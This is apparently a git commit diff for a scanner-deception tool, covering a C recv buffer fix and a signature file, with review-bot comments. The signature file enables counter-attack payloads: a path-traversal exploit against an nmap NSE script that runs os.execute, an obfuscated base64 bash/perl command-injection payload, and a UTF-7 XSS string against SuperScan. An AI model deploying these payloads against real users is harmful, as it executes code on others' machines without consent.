Fixed buffer len for recv
This commit is contained in:
parent
042ad01496
commit
600287f90f
@ -69,7 +69,7 @@ void* process_connection(void *arg)
|
||||
int tid = *((int*)(&arg));
|
||||
//int len;
|
||||
string str;
|
||||
char buffer;
|
||||
char buffer[1000];//TODO: to be fixed
|
||||
int original_port=DEFAULT_PORT;
|
||||
int n = 0;
|
||||
time_t timestamp;
|
||||
@ -79,7 +79,6 @@ void* process_connection(void *arg)
|
||||
|
||||
while(1) {
|
||||
|
||||
sleep(1);
|
||||
for(int i = 0; i < MAX_CLIENT_PER_THREAD; i++)
|
||||
{
|
||||
|
||||
@ -91,7 +90,7 @@ void* process_connection(void *arg)
|
||||
if(configuration->getConfigValue(OPT_NOT_NMAP_SCANNER))
|
||||
n = 1; // just reply...
|
||||
else
|
||||
n = recv(threads[tid].clients[i], &buffer,1, 0);
|
||||
n = recv(threads[tid].clients[i], buffer,1, 0);
|
||||
|
||||
|
||||
// deal with different recv buffer size
|
||||
|
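Review bot: The new `char buffer[1000];//TODO: to be fixed` leaves the array uninitialized while the `recv` on the new side still reads at most one byte into it, so the declared size and the read length are unrelated and the other 999 bytes are stack garbage; if the code after the hunk (`// deal with different recv buffer size` is the last visible line, and the loop body of process_connection continues past it) ever treats `buffer` as a string, that is an uninitialized read. Zeroing it at declaration, `char buffer[1000] = {0};`, removes that hazard at no cost, and if reading more than one byte is ever intended the length should be tied to the array, `sizeof buffer - 1`, rather than a second literal. The `TODO: to be fixed` should say what remains to be fixed (presumably the hard-coded 1000) now that the one-byte recv no longer overflows a single `char`. `n` is not checked for 0 or -1 anywhere inside the hunk; if that check is not below, the result of a failed or closed recv is used unchecked.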
@ -75,23 +75,33 @@
|
||||
|
||||
#Example: port range
|
||||
|
||||
#51-60 "550 4m2v4 (FUZZ_HERE)"
|
||||
51-60 "550 4m2v4 (FUZZ_HERE)"
|
||||
|
||||
#Example: Simple regular expression payloads
|
||||
|
||||
#8080 "word: [\w]+ [\d]+ [a-b]+ [1-2]+\n"
|
||||
#8081 "OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n"
|
||||
#8082 "word: ... \. \d \w \n"
|
||||
8080 "word: [\w]+ [\d]+ [a-b]+ [1-2]+\n"
|
||||
8081 "OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n"
|
||||
8082 "word: ... \. \d \w \n"
|
||||
|
||||
#Nmap regular expression matched payloads
|
||||
|
||||
#8100 "220 FUZZ_HERE ESMTP OpenSMTPD\r\n"
|
||||
#8101 "220 FUZZ_HERE SMTP ready to roll\r\n"
|
||||
#8102 "550 12345 FUZZ_HERE"
|
||||
#8103 "+OK Lotus Notes POP3 server version lLlfMoHcd ready j* on __FUZZ_HERE__\r\n"
|
||||
#8104 "HTTP/1.0 200 OK\r\nServer: Apache/__FUZZ__(Amazon)\r\nX-Powered-By: ASP\.NET\r\nCache-Control: no-cache, must-revalidate\r\nContent-type: text/html\r\nX-Powered-By: PHP/xxx\r\nExpires: Mon, 26 Jul 1997 05:00:00 GMT\r\n<title>Log In - Juniper Web Device Manager</title><address>Apache mod_perl/2.0.4 Perl/v5.10.1 Server at devtest.myhost.co.za Port 80</address>"
|
||||
8100 "220 FUZZ_HERE ESMTP OpenSMTPD\r\n"
|
||||
8101 "220 FUZZ_HERE SMTP ready to roll\r\n"
|
||||
8102 "550 12345 FUZZ_HERE"
|
||||
8103 "+OK Lotus Notes POP3 server version lLlfMoHcd ready j* on __FUZZ_HERE__\r\n"
|
||||
8104 "HTTP/1.0 200 OK\r\nServer: Apache/__FUZZ__(Amazon)\r\nX-Powered-By: ASP\.NET\r\nCache-Control: no-cache, must-revalidate\r\nContent-type: text/html\r\nX-Powered-By: PHP/xxx\r\nExpires: Mon, 26 Jul 1997 05:00:00 GMT\r\n<title>Log In - Juniper Web Device Manager</title><address>Apache mod_perl/2.0.4 Perl/v5.10.1 Server at devtest.myhost.co.za Port 80</address>"
|
||||
|
||||
## EXPLOITS ##
|
||||
|
||||
# NMAP
|
||||
# nmap --script http-domino-enum-passwords.nse -p 80 172.16.37.145 -sC -PN -n --script-args domino-enum-passwords.username='xxx',domino-enum-passwords.password='secr',domino-enum-passwords.idpath='/tmp/' -d4
|
||||
|
||||
80 "HTTP/1\.0 200 OK\r\nServer: Apache/(IBM_Lotus_Domino_v\.6\.5\.\d)\r\n\r\n--<html>\r\n--<body><a href=\x22user-UserID\x22>\r\n--<input name=\x22HTTPPassword\x22 value=\x22PPASSS\x22>\r\n--<input name=\x22FullName\x22 value=\x22\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2fusr\x2flocal\x2fshare\x2fnmap\x2fscripts\x2fhttp-domino-enum-passwords\x2ense\x00\x61\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x25\x64\x0d\x0a--\x22>\r\n\r\n--<a href=\x22\%?OpenDocumentddddd\x22>\r\n--<form action=\x22aaa?ReadForm&\x22>\r\n--</body>\r\n--</html>\r\nos\x2eexecute\x28\x22echo 'You have been PWNed';whoami; uname -a\x22\x29;\x0d\x0a\x0d\x0a"
|
||||
|
||||
#OS cmd injection payload for bash: $(cat output) and `cat output` injections
|
||||
8080 "/bin/bash\t-c\t{perl,-e,$0,useSPACEMIME::Base64,cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==}\t$_=$ARGV\x5b0\x5d;~s/SPACE/\x5ct/ig;eval;$_=$ARGV\x5b1\x5d;eval\x28decode_base64\x28$_\x29\x29;"
|
||||
|
||||
#McAffe SuperScan UTF7 XSS payload
|
||||
1010 "+ADw-img src=x onerror='a setter=alert,a=\x22UTF-7-XSS\x22;'+AD4-"
|
||||
|
||||
|
||||
|
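Review bot: Enabling the example line `8080 "word: [\w]+ [\d]+ [a-b]+ [1-2]+\n"` gives port 8080 two signatures in the same file, because `8080 "/bin/bash\t-c\t{perl,...}"` under `## EXPLOITS ##` already claims that port, and which one wins depends on how the signature parser treats duplicate ports, which is not visible here. Either leave that one example commented out or move it to an unused port next to `8081`/`8082`, e.g. `8083 "word: [\w]+ [\d]+ [a-b]+ [1-2]+\n"`. Uncommenting these lines also makes the FUZZ_HERE and regex example responses part of the default signature set, alongside the already-active nmap NSE, bash command-injection and UTF-7 XSS payloads further down; a one-line header comment stating that the shipped file contains active counter-attack payloads that operators should trim before deployment would make that explicit.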